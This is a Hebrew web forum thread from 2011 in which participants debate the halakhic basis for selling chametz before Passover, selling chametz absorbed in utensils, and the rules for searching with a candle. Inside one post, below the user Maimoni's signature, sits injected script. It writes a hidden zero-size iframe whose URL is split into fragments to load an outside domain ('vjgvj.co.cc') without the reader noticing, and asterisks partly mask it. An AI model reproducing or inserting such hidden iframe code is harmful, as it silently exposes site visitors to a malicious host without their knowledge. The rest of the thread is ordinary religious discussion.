| נשלח ב-13/4/2011 00:08 |
|
| |
מכירת חמץ - על שום מה
ידועים דברי התוס' ריש מסכת פסחים (ד"ה אור) "והטעם שהחמירו כאן טפי (יותר) מבשאר איסורי הנאה שלא הצריכו לבערם משום דחמץ מותר כל השנה ולא נאסר רק בפסח ולא בדילי מיניה (לא מופרשים ממנו) אי נמי שאני חמץ שהחמירה בו תורה לעבור בבל יראה ובבל ימצא החמירו חכמים..." על פי קבלה חמץ מורה על יצר הרע "שאור שבעיסה". אלו ואלו מסכימים "שהחמירו כאן טפי מבשאר איסור הנאה", לא רק משאר איסורים אלא "משאר איסור הנאה". חכמים אף אסרו חמץ (גמור) שעבר עליו הפסח. מכאן נולד הצורך למצוא פתרון למי שבידו כמות גדולה של חמץ שביעורו יהא כרוך בהפסד מרובה. כך נולדה מכירת חמץ. לא אכנס כאן לכל הפולמוס אודות המכירה ותקפותה. בשלב הראשון היה מדובר במכירה גמורה לכל דבר ועניין. כיום, בעידן התעשייתי כאשר במפעלים יש כמויות אדירות של חמץ המכירה הפכה לחוכא ואטלולא. וכי יש מפעל שיסכים למכור לגוי את כל התוצרת גם במחיר מלא? דווקא במגזר הפרטי, על כל פנים החרדי, חלה התפתחות חיובית. רוב הציבור אינו משאיר כלל חמץ בעין. משום מה התפתח מנהג חדש שכולם מוכרים את חמצם. מנהג זה אין לו שום מקור בגמ' ואף לאחר מכן. כל כולו נולד כדי לאפשר השארת חמץ גמור בלא לעבור בב"י וב"י ושלא ייאסר לאחר הפסח. לכל השאר די בבדיקה וביטול ואף אם ימצא גלוסקא יפה בפסח לא יעבור על ב"י וב"י כיוון שכבר הפקירה ורק צריך לבערה בפועל "שלא ישכח ויאכלנו" (רש"י פסחים ו' ד"ה כופה) הרי לנו בפירוש שאם בדק וביטל, גם אם בפועל ימצא חמץ בפסח עליו לבערו רק שלא ישכח ויאכלנו ולחשש זה הרי לא תועיל מכירתו לנכרי. ומדוע נהפך למנהג שהכול מוכרים חמצם גם שאינו ידוע. יתירה מזו. התפתח מנהג למכור החמץ הבלוע בכלים. החמץ הבלוע ולא הכלים גופא כי החזו"א העיר שאם ימכרו את הכלים יצטרכו להטבילם וטבילת כלים דאורייתא. בהלכה יש דיון אודות חמץ הדבוק בכלים. כיום כמעט שאין מצוי שיהיה חמץ בעין דבוק בכלים ועיקר המכירה היא משום החמץ הבלוע. והנה, כלי חרס אין לו הכשרה, כידוע, ולא מצינו כלל בחז"ל שלפני פסח יש לבער את כל כלי החרס של חמץ מהבית ומכירה הרי לא הומצאה עדיין בזמנם וכאן הבן צריך לשאול, מכירה זו על שום מה?
 |
|
|
|
|
| נשלח ב-13/4/2011 00:59 |
|
| |
חוץ מזה שיש בזה משום תמיכה ברב המוכר בזמן שכולם צריכים למעות אני לא חושב שיש בזה עניין נוסף ולכן אישית אני באמת נמנע מזה [ובעניין הפרנסה אפשר בידי אחרים..] אם כי יתכן שיהיו תרופות או מוצרי קוסמיקה שיש בהם תערובת חמץ והם לא נפסלו מאכילת כלב ולכן יש בזה משום תקנה לכלל הציבור וכבר ידוע לי על מקרים שהמכירה הצילה בדיעבד מהפסד מרובה
|
| נשלח ב-13/4/2011 01:26 |
|
| |
יתכן
יפה סיכמת.
יש לי קצת להוסיף.
בדיני חמץ יש לנו דוגמא של התנגשות בין שני עיקרים:
סילוק החמץ במידת האפשר מחיי האדם במהלך הפסח. צריך כמובן לבאר מדוע חמץ מפריע כל כך ומדוע סילוקו חשוב כל כך, אך נקבל זאת כהנחת יסוד שיכולה להתבאר על רקע ההקשר.
הפגיעה בחיי האדם בשל השינוי מאורחות החיים הרגילים (שינוי שבעצמו תורם לרושם של המצוה).
כל הלכה שהיא מהווה איזון בין המטרה הראשית שלה לבין המחיר שהיא גובה.
לפי זה, בתולדות דיני חמץ וביעורו יהיו נטיות לשני הכיוונים.
נכון הוא שבגמרא לא מצאנו מכירת חמץ כתקנה כללית. אבל מצאנו שמותר למכור את החמץ לפני החג גם אם הגוי לא יבערנו לפני החג (כך שיטת ב"ש). מזה נולדה העצה למכור את החמץ.
אם נדלג עד תקופתנו, הרי היום יש הישענות רבה על המילה הכתובה בספר. אין סומכים עוד על המנהג החי אלא על הספר, ובדרך כלל על הספר עם החומרות.
וכאן פועל הרצון הטוב להחמיר משום שחומרה היא יראת שמים.
וכאשר כאן איסור חמץ נדרש באופן קבלי, זה רק מחזק את הרצון להחמיר.
אזכיר כי בגמרא נחלקו אמוראים אם מותר לשמור כלים שבלעו חמץ לשימוש לאחר הפסח. מי שהתיר סבר שאין איסור לאחר הפסח (אפשר לומר בדבר כמה טעמים, כגון שזה נותן טעם לפגם, אבל איני זוכר את הסוגיה). מי שאסר סבר שהחמץ שבכלי חוזר ונבלע במה שיתבשל בו לאחר הפסח.
אבל אף אחד משני הצדדים לא סבר שחמץ שבלוע בכלים טעון ביעור מפני שהוא חמץ חשוב לעבור עליו כאיסור, בין מדאורייתא בין מדרבנן.
ויותר מכך, כבר אמרו בגמרא שפירורים בטלים מאליהם. ולא מצאנו שיעור ברור מזה, אם קצת פחות מכזית או גודל יותר קטן. (נכון שיש פוסקים שטענו שאין זה היתר מאליו אלא רק בהצטרף עוד תנאים כמו שם בגמרא שהפירורים אולי בחצר וייאכלו בידי ציפורים אבל אין זה עיקרה של סוגיה).
החומרה מבוססת לכאורה על צירוף של שתי הנחות שכל אחת נאמרה במקום אחר:
יש איסור של בל יראה ובל יימצא.
יש איסור אפילו במשהו.
האיסור השני נאמר בתערובות שבפסח. שאם נבלע איסור חמץ בתערובת, אין אומרים שיש כאן ביטול וכל התערובת מותרת, אלא היא אסורה. (גם כאן יש חומרות כגון חומרת הרמ"א בהסתמך על מקורות לפניו שלפי זה יש לאסור גם בתערובת חמץ בפסח שהיא נותן טעם לפגם).
אסורה באכילה או בהנאה, אבל לא לעבור עליה בבל ייראה ובבל יימצא, ולהתחייב בביעורה.
למסקנה: יתכן שאל "למה" מחמירים. התשובה היא שהתרגלו להאמין שזה חשוב, ובמיוחד כאן.
ויש כאן דבר נוסף. אחד מעקרונות החינוך האורתודוכסי בן זמננו (הדורות האחרונים) הוא שאין להסתמך על סברה ושיקול הדעת בפסיקת הלכה. אין אנו יודעים טעמן של הלכות ואין אנו יודעים להכריע במחלוקות ולכן נשאר לנו רק להחמיר וזה רצון ה'. גם כאשר המנהג המקובל להחמיר הוא נגד המקורות (כפי שהבאתי כאן) אין זה משנה כלום, כי אנו קטנים מכדי לדעת ולהבין מה נכון ומה לא, מה סותר ומה לא. ה"חינוך" הזה מצליח ואפילו מצליח מדי. גם כאן, במכירת חמץ שבכלים.
__
*** נוספה שורה אחת שבלעדיה היה מקום לאי הבנה - לגבי טיב איסור משהו _______________
שומר פיו ולשונו - שומר מצרות נפשו
******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");>
תוקן על ידי מיימוני ב- 13/04/2011 01:29:35
 |
|
|
|
|
| נשלח ב-13/4/2011 01:26 |
|
| |
יתכן
1. לגבי ההוכחה שלך מהמציאות ההיסטורית (על כלי החרס) - זה הזכיר לי את הקטע עם המגן אברהם שהגיע למסקנה שאסור לבדוק חמץ בנר עם שמן, כי בגלל שזה עלול לטפטף אנשים לא יבדקו היטב (מקווה שמובן מה מוזר פה, וכבר רש"ז מלאדי טען זאת)
2. אתה מיום ליום הופך יותר ויותר לחידה בעיניי. מה מטרת האשכול הזה? א. לקדם יותר שריפות - במקום מכירות - חמץ? למה זה טוב, מבחינתך? הרי השריפות עושות בלגן, לכלוך ונזק סביבתי אדיר. המכירות הן סטריליות... ב. לקדם שיפסיקו למכור? מה אכפת לך? שימכרו. ג. להראות את האבסורד שבדברים שאנשים עושים כי ככה לימדו אותם? (הרסתי לך את הפואנטה? :-( )
|
| נשלח ב-13/4/2011 01:30 |
|
| |
הנוכח
לגבי המגן אברהם. שמא התכוונת לנר חלב (בצירה)?
ומה מוזר כאן? לא הבנתי. התוכל לבאר?
לגבי מטרת הדיון, מה רע ב"להגדיל תורה ולהאדיר"? ללמוד את מקורות הסוגיה ואת התפתחותה ואלו עקרונות פעלו כאן, במודע ולא במודע?
|
|
|
|
| נשלח ב-13/4/2011 04:47 |
|
| |
מיימוני
תמהני עליך שאינך יודע שאין לבדוק בנר שמן ויש מחלוקת אם בדיעבד זה טוב (אורח חיים תל"ג ב') על פי אגדה ששמעתי לפני שנה (אולי מוטעית), ר' שניאור זלמן מלאדי העיר על כך שסתם נר שבתקופת המשנה והתלמוד הוא נר של שמן, (ראה למשל כאן http://en.wikipedia.org/wiki/History_of_candle_making) ועל כן לא יתכן שנר של שמן פסול לבדיקה
לגבי הלהגדיל תורה ולהאדירה... נו נו...
|
| נשלח ב-13/4/2011 07:30 |
|
| |
הנוכח
לא, לא הכרתי. אני לומד את המקורות (תלמוד) אבל לא את ספרי האחרונים (שולחן ערוך והלאה). דרכי היא לפסוק מן המקורות ולא מספרי ליקוטים, שנשענים יותר מדי על שיטות של פרשנות ועל מנהגים.
כיון שכתבת ושאלת, חזרתי ובדקתי נושא זה, ואין כמו התקליטור של בר אילן כדי לבדוק דבר מיסודותיו.
לגבי איסור בדיקת הנר, כמדומה שההתפתחות של העדפת נר שעווה היא כזו:
א. יש מצוה מן התורה להיות בלי חמץ בפסח, ואף לבערו. ב. הובן שאין זה מספיק להטמין את החמץ אלא צריך שלא יהיה בשום מקום. ג. לכן תיקנו שיצטרכו גם לחפש אחריו כדי לקיים את המצוה במלואה. ד. היה קשה לחפש בבית שאין בו אורה, אפילו ביום, שהרי החלונות היו קטנים וחשמל לא היה. ה. תיקנו נר. ו. ובלילה, שבו אור הנר מבהיק יותר וגם מפני שפנויים בו יותר. וכן שזו תחילת היום שלפני פסח. ז. הטכנולוגיה המשופרת ביותר של ימי חז"ל היתה, כדבריך, מה שנקרא "נר" שהינו קופסה קטנה מחרס עם נקב או שנים שממלאים אותה בשמן ונועצים בה פתילה ומדליקים אותה. ח. כבר בימי הגמרא מצאנו שאסרו אבוקה, שיש בה כמה פתילות, ולמרות שאורה רב, לפי שאינו יכול לקרבנה למקומות צרים שאולי הניח בהם חמץ, או אולי שמא נפל בהם חמץ. ט. לפי שיקול זה, יש לבחור לחיפוש את כלי המאור המאיר ביותר והבטיחותי ביותר. ולפי זה, בזמננו, ברור שיש להעדיף פנס חשמלי, והטוב ביותר הוא זה שהתחדש לאחרונה ו"לד" שמו. וכן נוהגים אצלנו.
סקירה של מקורות שמתבארים לפי הטעם הזה:
תלמוד בבלי מסכת פסחים דף ז עמוד ב תנו רבנן: אין בודקין לא לאור החמה, ולא לאור הלבנה, ולא לאור האבוקה, אלא לאור הנר. תלמוד בבלי מסכת פסחים דף ח עמוד א ואבוקה לא? והאמר רבא: מאי דכתיב +חבקוק ג+ ונגה כאור תהיה קרנים מידו לו ושם חביון עזו למה צדיקים דומין בפני שכינה - כנר בפני האבוקה. ואמר רבא: אבוקה להבדלה - מצוה מן המובחר! [=מדוע אם כן לא להשתמש באבוקה שיתרון אורה רב?] - אמר רב נחמן בר יצחק: זה יכול להכניסו לחורין ולסדקין, וזה - אינו יכול להכניסו לחורין ולסדקין. רב זביד אמר: זה - אורו לפניו, וזה - אורו לאחריו. רב פפא אמר: האי - בעית, והאי - לא בעית. [באבוקה חושש. ונראה שהיינו דרב נחמן=מבאר את דברי רב נחמן] רבינא אמר: האי - משך נהורא, והאי - מיקטף איקטופי. ובטור, כ1200 שנה לאחר מכן, טור אורח חיים הלכות פסח סימן תלג
כתב א"א הרא"ש ז"ל ע"כ נוהגין באשכנז שאין בודקין אלא בנר של שעוה אבל לא בנר של חלב שמא יטיף על הכלים ולא בנר של שומן שמא יטיף על כלי החלב ולא בנר של שמן שירא שמא יטיף על הבגדים וגם אינו יכול להכניסו לחורין ולסדקין.
[על הבגדים = בגדי הבודק עצמו. בחלב (בצירה) שהרי אסור באכילה ושמא ייטוף על כלי אוכל ויטריפם] אבל מוזר שר' יוסף קארו, כשהוא מסכם את הטור להלכה, כותב בלשון פסק: שולחן ערוך אורח חיים הלכות פסח סימן תלג סעיף ב
אין בודקין (ח) לאור האבוקה אלא לאור הנר, (ט) ה ולא בנר של חלב, ולא של שומן, (י) ולא של שמן, (יא) אלא בנר של שעוה
[והרי משמע שלמד שזה איסור גמור לעשות בנר שמן, שאין כאן המלצה או מנהג כמו בלשון הטור. ועוד שהשווה לשונותיו בין אבוקה לבין חלב לבין שומן לבין שמן]. ובמיוחד תמוה הוא שבגמרא משמע שאם בדק באבוקה פסולה הבדיקה בדיעבד והאם יש לפסול בשאר הטכנולוגיות שמנה רבנו בעל השולחן ערוך? ושמא גם בגמרא אם בדק באבוקה יצא בדיעבד?
 |
|
|
|
|
| נשלח ב-13/4/2011 07:40 |
|
| |
וכיון דאתא לידן נימא בה מילתא. [= כיון שהגיע הדבר לידנו, נאמר בו משהו. לשון מקובלת לתוספת של חידוש והבהרה].
ראשית, לשאלת ייתכן: אפשר שהחיזוק לחיפוש אחרי פירורים הגיע מן הלשון "חורין וסדקין".
ייראה לי שהלשון הזו מצביעה, בימי המשנה והגמרא, על חורים בכתלי הבית, שהשתמשו בהם כעין מגירות בארונות שלנו היום. והרי באמת אפשר שהניחו בהם חמץ, בכוונה או במקרה.
צא וראה שחורים כאלו היו חלק מן הבניה, ואף יכלו לחבר בין שתי דירות שיש להן כותל משותף כפי שמצאנו ברשימת ההלכות של אז.
במשך הדורות, השתנתה צורת הבניה (יש לעיין במה נבדלה הבניה של בבל מאירופה, ואיני יודע אלא רק יכול לשער. אולי באירופה בימי הראש כבר נהגו בעץ? בעוד שבבבל וארץ ישראל היו משתמשים בטיט, או באבנים סדוקות? ואין כוונתי לעשירים אלא לכל אדם ולעניים). לפיכך, המונח "חורים וסדקים" כבר לא ציין מגירה גדולה שיש בה מקום לכזית לחם לכל הפחות אלא דבר קטן יותר.
חשבו לרגע מה נקרא אצלנו בליל בדיקת חמץ "לחפש בחורים וסדקים", ובאיזה גודל של חורים מדובר. יש נוהגים להחביא פתיתים (יש נוהגים בחמץ ממש, ועוטפים שלא יתפורר ויתפזר יותר) כדי שהבודק יתאמץ וימצא. הרי החיפוש הזה נעשה על פחות מכזית לפי מקצת שיטות.
לפיכך, אפשר שלא במודע החיפוש מתמקד במקומות קטנים וצרים שבעצם היו צריכים להיות פטורים. ויש לנו סוגיות שדנות מה יקרה אם יש כמה פחות מכזיתים חמץ בכמה מקומות בבית. ולמסקנה אין הבית מצרפם, וייראה לי שכל אחד בטל במקומו (אבל אפשר לדייק גם הפוך).
*** ועוד דבר שנתחדש לי וזה חידוש גדול עבורי.
בגמרא שאלו נר מנין וענו תשובה מפורסמת:
תלמוד בבלי מסכת פסחים דף ז ב - ח עמוד א תנו רבנן: אין בודקין לא לאור החמה, ולא לאור הלבנה, ולא לאור האבוקה, אלא לאור הנר,
מפני שאור הנר יפה לבדיקה. ואף על פי שאין ראיה לדבר - זכר לדבר, שנאמר +שמות יב+ שבעת ימים שאר לא ימצא בבתיכם ואומר +בראשית מד+ ויחפש בגדול החל ואומר +צפניה א+ בעת ההיא אחפש את ירושלים בנרות ואומר +משלי כ+ נר ה' נשמת אדם חפש כל חדרי בטן. ובגמרא הביא רב חסדא את הלימוד הזה (ואיני יודע אם משם עצמו או שסמך על הברייתא ולא נאמר כן בשמו).
תלמוד בבלי מסכת פסחים דף ז עמוד ב
לאור הנר וכו'. מנא הני מילי? אמר רב חסדא: למדנו מציאה ממציאה, ומציאה מחיפוש, וחיפוש מחיפוש, וחיפוש מנרות, ונרות מנר. מציאה ממציאה - כתיב הכא +שמות יב+ שבעת ימים שאר לא ימצא בבתיכם וכתיב התם +בראשית מד+ ויחפש בגדול החל ובקטן כלה וימצא. ומציאה מחיפוש דידיה, וחיפוש מנרות - דכתיב +צפניה א+ בעת ההיא אחפש את ירושלים בנרות, ונרות מנר, דכתיב +משלי כ+ נר (אלהים) [ה'] נשמת אדם חפש כל חדרי בטן.
יש מפרשים שזו גזירה שווה, ומתקשים בדבר הרבה. וכן התקשיתי גם אני ימים רבים. ועתה נראה פשוט שאין כאן גזירה שווה אלא הסבר שמכנים "הגיוני", כלומר סברה.
צריך שלא יהיה חמץ בבית? איך אפשר להבטיח זאת? על ידי חיפוש. וכיצד מחפשים? בנר. אמנם דרך האמוראים היא לא להביא את הדברים מסברה סתם אלא להלבישם בציטוטי פסוקים. ופשוט.
|
|
|
|
| נשלח ב-13/4/2011 08:08 |
|
| |
ייתכן על פסח אתה שואל שאלות? מכירה על שום מה? קטניות על שום מה? שרויה על שום מה? שום על שום מה? וכו'
|
|
| נשלח ב-13/4/2011 09:22 |
|
| |
| ייתכן כתב: |  | | ... גדולה של חמץ שביעורו יהא כרוך בהפסד מרובה. כך נולדה מכירת חמץ. לא אכנס כאן לכל הפולמוס אודות המכירה ותקפותה. בשלב הראשון היה מדובר במכירה גמורה לכל דבר ועניין. כיום, בעידן התעשייתי כאשר במפעלים יש כמויות אדירות של חמץ המכירה הפכה לחוכא ואטלולא. וכי יש מפעל שיסכים למכור לגוי את כל התוצרת גם במחיר מלא? ... |
|
חוק החברות מגדיר בצורה ברורה את תכליתן של החברות העסקיות. בלשונו של החוק, מטרתה של חברה היא "להביא להשׂאת(1) רווחיה".
לשון החוק לחוד, והמציאות לחוד, אך דומני כי ההנחה שרוב החברות העסקיות פועלות למטרות רווח, אינה הנחה מופרכת כלל ועיקר.
ידוע הסיפור על ברנרד שאו, והקביעה כי לכל דבר יש מחיר, ולכן הציטוט שהדגשתי למעלה, אינו נכון. למאפיית אנג'ל יש כמות חמץ גדולה מאד. אין לי ספק שבלי מכירת החמץ, הפסדיה יהיו גבוהים, משום שיקח זמן לא קצר לאחר הפסח, עד שניתן יהיה להתחיל ולאפות שוב. מאפיות האופות באמצעות שאור ולא באמצעות שמרים, יסבלו לפרק זמן ארוך אף יותר.
ובכל זאת, האם אין מחיר לחמץ? אם יציעו לבעלי המאפיה למכור את החמץ, בפועל, תמורת מיליון דולר, אולי יסרבו. אך תמורת מאה מיליון? תמורת מאה מיליארד?
בסופו של דבר, לא מבקשים ממישהו למכור את בתו לאמה כאן, אלא למכור חמץ. וכשמדובר במי שמתפרנס ממכירת אותו חמץ לאורך כל השנה, מה הרבותא בכך שתמורת המחיר המתאים, מכור ימכור?
==============
מפרופסור ישראל אומן שמעתי את הסיפור הבא:
באחת השנים בהן שהה באוניברסיטה מסויימת בארה"ב, מצא עצמו לקראת חג הפסח עם ארגז של כמה וכמה בקבוקי ויסקי משובח. בקבוקים יקרים. עמית מחקר אירי, גוי קתולי, הסכים לקנות ממנו את הבקבוקים, לאחר שיחה ארוכה בה שאל - וקיבל הסברים ארוכים - אודות מכירת החמץ.
השליש הפרופסור הגוי את דמי המקדמה, ולקח לרשותו את הארגז.
בתום הפסח, כשבא פרופסור אומן לקחת את ארגז הויסקי, ולהחזיר את המקדמה - כי עמיתו לא שילם את כל הסכום - גילה שהארגז קל בהרבה ממה שהיה שבוע לפניכן.
"הוא הבין היטב את ההסבר שלי", אמר פרופסור אומן, "והייתי צריך לדעת מה קורה כשמשאירים בקבוקים של ויסקי משובח אצל אירי שיודע להעריך זאת".
"שמחתי, למרות שהיה מדובר בויסקי באמת יקר", המשיך תוך שהוא מבהיר: "הרי זה היה שלו, הוא קנה את זה!".
(1) השׂאה - ב-שׂ שׂמאלית - מלשון שיא. זה המונח העברי ל"מקסימיזציה". הבאה לשיא.
|
|
|
|
| נשלח ב-13/4/2011 09:40 |
|
| |
אינני יודע מה קורה בציבור החרדי, אך אני יכול להעיד כי בחוגים בהם אני מסתובב גוברת בשנים האחרונות המגמה שלא להסתמך על מכירה (פורמלית) אם לא לצורך גדול. יש מספיק אמצעי בטיחות אחרים כנגד חמץ - נקיונות, בדיקה וביטול, ואין צורך מעבר לכך. אדרבה, כאשר אני יודע שאם לא אנקה היטב יהיה לי חמץ בפסח, אני מתייחס לנקיון בצורה יותר רצינית. ידוע לי כי גם הגרי"ד סולובייצ'יק הסתייג ממכירה שלא לצורך גדול (כך שמעתי מתלמידו). הרצון לכסות את עצמך מכל הכיוונים גורם להשכחת עיקר הדין - אף אחד כבר לא יודע (ולא צריך לדעת) מה באמת מותר ומה אסור, כי אנחנו כל כך רחוקים ממצב שבו עלול להתעורר הצורך להכריע. על עצמי אני יכול להעיד כי היו שנים בהם מכרתי חמץ לגוי בפועל - ע"י מסירת החמץ או לפחות ע"י מסירת מפתח וקבלת תשלום הוגן. בשנים האחרונות אינני נזקק גם לזה. בתכנון נכון אפשר לסיים את כל מוצרי החמץ בזמן. מוצרים שאינם חמץ אך אינני אוכל מהם בפסח אני משאיר בארון סגור ולא עובר עליהם בב"י. מי שבמילא לא משאיר את החמץ ורק חותם על שטר מכירה "ליתר ביטחון", מראה בכך כי הוא מתייחס למכירה כאל פיקציה והופך גם את מי שבאמת צריך למכור (חברות, חנויות וכד') למשתתפים במשחק. כאמור לעיל, אני לא היחיד ואני חש כי מדובר במגמה ההולכת ומתגברת. יהיה מענין לדון במניעים לכך והאם זה חלק משינוי תפיסה כללי יותר אך אכמ"ל.
|
|
| נשלח ב-13/4/2011 09:46 |
|
| |
עצינוי שתי נקודות מה תאמר לבעלי חנויות ומפעלים? קיימת גם מגמה שלא לסמוך גם על מכירת חמץ של חנויות ומפעלים, עד כדי כך ששמעתי בעלי חנויות שמתלוננים שאחרי ששגעו אותם על צורת המכירה לא קונים מהם.
א"מ הכ"מ למדנו לא להשאיר חמץ בבית אבל לקנות בחנות שמכרה חמצה כדין מייד אחר החג.
|
| נשלח ב-13/4/2011 09:52 |
|
| |
לבעלי חנויות ומפעלים אומר למכור. לי יש דרך אחרת להימנע מן האיסור ולהם אין, ולכן עליהם להסתמך על היתרים שכאלה. (כבר בהודעתי הקודמת הדגשתי שראוי שלא להסתמך על המכירה שלא במקום צורך גדול ואין לך צורך גדול מקיומו של מפעל ויכולתו לספק סחורה מייד לאחר החג.)
|
| נשלח ב-13/4/2011 09:53 |
|
| |
כיצד?
|
|
|
|
| נשלח ב-13/4/2011 10:07 |
|
| |
אינני מערער על תוקפה של המכירה הנהוגה כיום. אפשר להשתמש בה, ואפשר גם לעשות בצורה יותר מועילה. מרגע שהוסכם כי ניתן למכור, הפרטים הטכניים הם פחות עקרוניים. כל מה שאני בא לומר זה שלמרות שהדבר אפשרי ותקף, לא ראוי להשתמש בו במצבים של משק בית נורמלי.
|
| נשלח ב-13/4/2011 10:18 |
|
| |
.
עציוני,
האם ראוי להכניס פירות הביתה דרך החלון?
|
|
|
|
|